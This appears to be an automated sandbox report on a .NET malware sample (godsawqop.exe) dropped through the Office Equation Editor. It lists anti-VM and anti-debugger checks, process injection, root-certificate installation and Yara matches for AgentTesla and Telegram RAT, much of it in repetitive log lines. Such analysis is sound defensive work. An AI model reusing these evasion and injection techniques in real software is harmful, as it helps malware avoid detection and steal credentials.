Source: 4.2.godsawqop.exe.340000.0.unpack, ReadTargetFrameworkId.cs	Base64 encoded string: 'MCuG7XUs38P6k4WdnTWI3IANa/sgVb7YGhbD75ZlqVzJB6xUpWr2V0s9Jj5+GNXr', 'i4nNrNYcW4k/GlGDwrHAx4ioVbST5Yvb6lMfzGT6KETSOeBNtqnuqj6YyPMmGH62', 'xG0LPJbgvTX95AxOgDC8xNrioLzel7bVSHjXBpcGDAkKQDJ2NLU0ll1cDptM5xoz', 'qXzECWWb3k/y0iiBy1/Qlh6P50QPGNrdKnkwfURW1FbtAT588B16q/jM9Iomo01s'
Source: 4.0.godsawqop.exe.340000.0.unpack, ReadTargetFrameworkId.cs	Base64 encoded string: 'MCuG7XUs38P6k4WdnTWI3IANa/sgVb7YGhbD75ZlqVzJB6xUpWr2V0s9Jj5+GNXr', 'i4nNrNYcW4k/GlGDwrHAx4ioVbST5Yvb6lMfzGT6KETSOeBNtqnuqj6YyPMmGH62', 'xG0LPJbgvTX95AxOgDC8xNrioLzel7bVSHjXBpcGDAkKQDJ2NLU0ll1cDptM5xoz', 'qXzECWWb3k/y0iiBy1/Qlh6P50QPGNrdKnkwfURW1FbtAT588B16q/jM9Iomo01s'
Source: 5.2.godsawqop.exe.340000.0.unpack, ReadTargetFrameworkId.cs	Base64 encoded string: 'MCuG7XUs38P6k4WdnTWI3IANa/sgVb7YGhbD75ZlqVzJB6xUpWr2V0s9Jj5+GNXr', 'i4nNrNYcW4k/GlGDwrHAx4ioVbST5Yvb6lMfzGT6KETSOeBNtqnuqj6YyPMmGH62', 'xG0LPJbgvTX95AxOgDC8xNrioLzel7bVSHjXBpcGDAkKQDJ2NLU0ll1cDptM5xoz', 'qXzECWWb3k/y0iiBy1/Qlh6P50QPGNrdKnkwfURW1FbtAT588B16q/jM9Iomo01s'
Source: 5.0.godsawqop.exe.340000.0.unpack, ReadTargetFrameworkId.cs	Base64 encoded string: 'MCuG7XUs38P6k4WdnTWI3IANa/sgVb7YGhbD75ZlqVzJB6xUpWr2V0s9Jj5+GNXr', 'i4nNrNYcW4k/GlGDwrHAx4ioVbST5Yvb6lMfzGT6KETSOeBNtqnuqj6YyPMmGH62', 'xG0LPJbgvTX95AxOgDC8xNrioLzel7bVSHjXBpcGDAkKQDJ2NLU0ll1cDptM5xoz', 'qXzECWWb3k/y0iiBy1/Qlh6P50QPGNrdKnkwfURW1FbtAT588B16q/jM9Iomo01s'

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Roaming\godsawqop.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Data Obfuscation:

Binary or sample is protected by dotNetProtector

Show sources

Source: godsawqop.exe	String found in binary or memory: dotNetProtector
Source: godsawqop.exe, 00000004.00000000.402764820.0000000000342000.00000020.00020000.sdmp	String found in binary or memory: rset_ShowInTaskbarFindFirstCharRegularMagicNumberGetSerialNumberMethodRowReaderDESCryptoServiceProviderMethodBuilderModuleBuilderTypeBuilderM_typeBuilderAssemblyBuilderM_assemblyBuilderGetYearMonthDayOrderArg_ArrayLengthsDifferlpBuffer_tmpOneCharBufferResourceManagerDebuggerFrameDescHelperSeqPointsHelperIComparerSingleRangeComparerFieldEqualityComparerByteEqualityComparerCreateProcessAsUserIsGenericParameterIsNativeWriterStringWriterget_IsPointerIRvaFileOffsetConverterBitConverterM_converterIsCasterSet_AssemblyResolverMemberMDInitializerGetTokenForFloorNotPermittedErrorCreateInstanceDefaultCtorSet_AMDesignatorGetDateSeparatorCheckSeparatorGet_ListSeparatorIEnumeratorGetEnumeratorTextElementEnumeratorGetILGenerator.ctor.cctordotNetProtectorIsStaticConstructorDefineConstructorget_IsConstructorCreateDecryptorIntPtrPropertyPtrIsLdstrHaveHouriz
Source: godsawqop.exe	String found in binary or memory: dotNetProtector
Source: godsawqop.exe, 00000005.00000000.454206707.0000000000342000.00000020.00020000.sdmp	String found in binary or memory: rset_ShowInTaskbarFindFirstCharRegularMagicNumberGetSerialNumberMethodRowReaderDESCryptoServiceProviderMethodBuilderModuleBuilderTypeBuilderM_typeBuilderAssemblyBuilderM_assemblyBuilderGetYearMonthDayOrderArg_ArrayLengthsDifferlpBuffer_tmpOneCharBufferResourceManagerDebuggerFrameDescHelperSeqPointsHelperIComparerSingleRangeComparerFieldEqualityComparerByteEqualityComparerCreateProcessAsUserIsGenericParameterIsNativeWriterStringWriterget_IsPointerIRvaFileOffsetConverterBitConverterM_converterIsCasterSet_AssemblyResolverMemberMDInitializerGetTokenForFloorNotPermittedErrorCreateInstanceDefaultCtorSet_AMDesignatorGetDateSeparatorCheckSeparatorGet_ListSeparatorIEnumeratorGetEnumeratorTextElementEnumeratorGetILGenerator.ctor.cctordotNetProtectorIsStaticConstructorDefineConstructorget_IsConstructorCreateDecryptorIntPtrPropertyPtrIsLdstrHaveHouriz
Source: godsawqop.exe.2.dr	String found in binary or memory: dotNetProtector
Source: godsawqop.exe.2.dr	String found in binary or memory: rset_ShowInTaskbarFindFirstCharRegularMagicNumberGetSerialNumberMethodRowReaderDESCryptoServiceProviderMethodBuilderModuleBuilderTypeBuilderM_typeBuilderAssemblyBuilderM_assemblyBuilderGetYearMonthDayOrderArg_ArrayLengthsDifferlpBuffer_tmpOneCharBufferResourceManagerDebuggerFrameDescHelperSeqPointsHelperIComparerSingleRangeComparerFieldEqualityComparerByteEqualityComparerCreateProcessAsUserIsGenericParameterIsNativeWriterStringWriterget_IsPointerIRvaFileOffsetConverterBitConverterM_converterIsCasterSet_AssemblyResolverMemberMDInitializerGetTokenForFloorNotPermittedErrorCreateInstanceDefaultCtorSet_AMDesignatorGetDateSeparatorCheckSeparatorGet_ListSeparatorIEnumeratorGetEnumeratorTextElementEnumeratorGetILGenerator.ctor.cctordotNetProtectorIsStaticConstructorDefineConstructorget_IsConstructorCreateDecryptorIntPtrPropertyPtrIsLdstrHaveHouriz

Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Code function: 4_2_00342B21 push edi; iretd	4_2_00342B22
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Code function: 4_2_0034A81C push edx; ret	4_2_0034A824
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Code function: 4_2_00344BFC pushad ; retf	4_2_00344BFD
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Code function: 4_2_00347C63 push cs; iretd	4_2_00347C6B
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Code function: 4_2_002D88CB push es; retn 0040h	4_2_002D899E
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Code function: 4_2_004FABDC push edi; iretw	4_2_004FABE2
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Code function: 4_2_00505893 push ebp; retf	4_2_005058B6
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Code function: 4_2_005051BD push esi; iretd	4_2_005051BE
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Code function: 4_2_0051A78A push edi; retf	4_2_0051A78D
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Code function: 4_2_00655B65 push esi; ret	4_2_00655B66
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Code function: 4_2_006A5B95 push edx; ret	4_2_006A5B96
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Code function: 5_2_00342B21 push edi; iretd	5_2_00342B22
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Code function: 5_2_0034A81C push edx; ret	5_2_0034A824
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Code function: 5_2_00344BFC pushad ; retf	5_2_00344BFD
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Code function: 5_2_00347C63 push cs; iretd	5_2_00347C6B

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\godsawqop.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\goshcj[1].exe			Jump to dropped file

Source: C:\Users\user\AppData\Roaming\godsawqop.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Users\user\AppData\Roaming\godsawqop.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Users\user\AppData\Roaming\godsawqop.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1212	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe TID: 1972	Thread sleep time: -420000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe TID: 2812	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe TID: 2812	Thread sleep time: -150000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe TID: 2624	Thread sleep count: 9656 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe TID: 2624	Thread sleep count: 83 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe TID: 2812	Thread sleep count: 110 > 30	Jump to behavior

Source: C:\Users\user\AppData\Roaming\godsawqop.exe

Code function: 4_2_00310FC7 rdtsc

4_2_00310FC7

Source: C:\Users\user\AppData\Roaming\godsawqop.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\AppData\Roaming\godsawqop.exe

Window / User API: threadDelayed 9656

Jump to behavior

Source: C:\Users\user\AppData\Roaming\godsawqop.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Source: C:\Users\user\AppData\Roaming\godsawqop.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Thread delayed: delay time: 30000			Jump to behavior

Anti Debugging:

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Show sources

Source: C:\Users\user\AppData\Roaming\godsawqop.exe

Code function: 4_2_0080BAA4 CheckRemoteDebuggerPresent,

4_2_0080BAA4

Source: C:\Users\user\AppData\Roaming\godsawqop.exe

Code function: 4_2_00310FC7 rdtsc

4_2_00310FC7

Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Roaming\godsawqop.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\AppData\Roaming\godsawqop.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\AppData\Roaming\godsawqop.exe

Memory written: C:\Users\user\AppData\Roaming\godsawqop.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\godsawqop.exe C:\Users\user\AppData\Roaming\godsawqop.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process created: C:\Users\user\AppData\Roaming\godsawqop.exe C:\Users\user\AppData\Roaming\godsawqop.exe			Jump to behavior

Source: godsawqop.exe, 00000005.00000002.724489859.0000000000BD0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: godsawqop.exe, 00000005.00000002.724489859.0000000000BD0000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: godsawqop.exe, 00000005.00000002.724489859.0000000000BD0000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Queries volume information: C:\Users\user\AppData\Roaming\godsawqop.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Queries volume information: C:\Users\user\AppData\Roaming\godsawqop.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\godsawqop.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Telegram RAT

Show sources

Source: Yara match	File source: 00000005.00000002.724727774.00000000024E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: godsawqop.exe PID: 2236, type: MEMORYSTR

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 4.2.godsawqop.exe.32ea110.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.godsawqop.exe.3320330.2.raw.unpack, type: UNPACKEDPE
